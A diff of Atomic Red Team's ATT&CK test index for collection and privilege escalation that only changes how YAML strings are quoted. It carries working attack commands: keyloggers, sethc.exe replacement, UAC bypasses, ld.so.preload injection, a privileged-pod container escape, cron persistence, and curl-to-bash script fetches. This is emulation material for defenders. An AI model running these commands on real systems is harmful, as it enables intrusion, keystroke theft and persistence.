install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore - ' +' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: 
@@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} - ' +' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - ' +' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script - ' +' supported_platforms: - linux - macos 
@@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} - ' +' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force - ' +' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - ' +' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" - ' +' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} - ' +' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - ' +' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) - ' +' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: 
@@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud - ' +' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot - ' +' supported_platforms: - linux input_arguments: 
@@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed - ' +' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat - ' +' executor: command: 'import -window root #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour - ' +' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore - ' +' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: 
@@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: 
@@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob 
@@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
@@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview 
@@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: 
@@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: 
@@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true 
